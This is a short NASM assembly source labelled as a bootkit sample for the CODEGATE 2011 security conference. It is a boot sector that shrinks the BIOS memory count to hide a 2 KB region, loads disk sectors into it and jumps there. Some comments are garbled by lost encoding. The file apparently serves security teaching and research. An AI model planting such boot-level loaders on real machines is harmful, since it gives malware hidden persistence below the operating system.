;==============================================================================
; bootkit sample for for CODEGATE 2011 
;
;==============================================================================
; Author    somma (somma@fsksec.co.kr)
;           http://somma.egloos.com
;==============================================================================
; All rights reserved by FSK Security Co.Ltd.
;==============================================================================

ORG 0
BITS 16
CPU 486

; DL = Boot drive, 1h = floppy1, 80h = primary harddisk, etc
; CS = 0
; IP = 0x7c00 
;
jmp 0x07c0:bootsector_start                     ; now cs = 0x07c0

bootsector_start:
	; bootkit code    . ( int 12h trick! )
    cld    
    xor     bx, bx
    mov     ds, bx
    mov     si, 0413h               ; linear address of 0040:0013h
    sub     [si], word 2            ; - 2048 bytes-> 4 sector!
    mov     ax, word [si]
    shl		ax, 6                   
    
    ; magic_room  jump  ڵ带  
    ;
    mov word [JUMP_TO_MAGIC_ROOM + 7c00h + 01h], bx
    mov word [JUMP_TO_MAGIC_ROOM + 7c00h + 03h], ax

        
read_boot_loader:
    mov     es, ax
	mov		ax, 0x0202				; 2 sector
    mov		dh, 0x00
	mov		cx, 0x0002		        ; 0 ° Ǹ, 2°     
    int		0x13
	jc		read_boot_loader


JUMP_TO_MAGIC_ROOM:
    ; EA xxxxyyyy          jmp     far ptr yyyy:xxxx (segment : offset)
    db      0xea
    dw      0x0000      ; offset
    dw      0x0000      ; segment


;#############################
;##  Boot Sector Signature  ##
;#############################

    times   510-($-$$)    db 0	
	dw      0AA55h
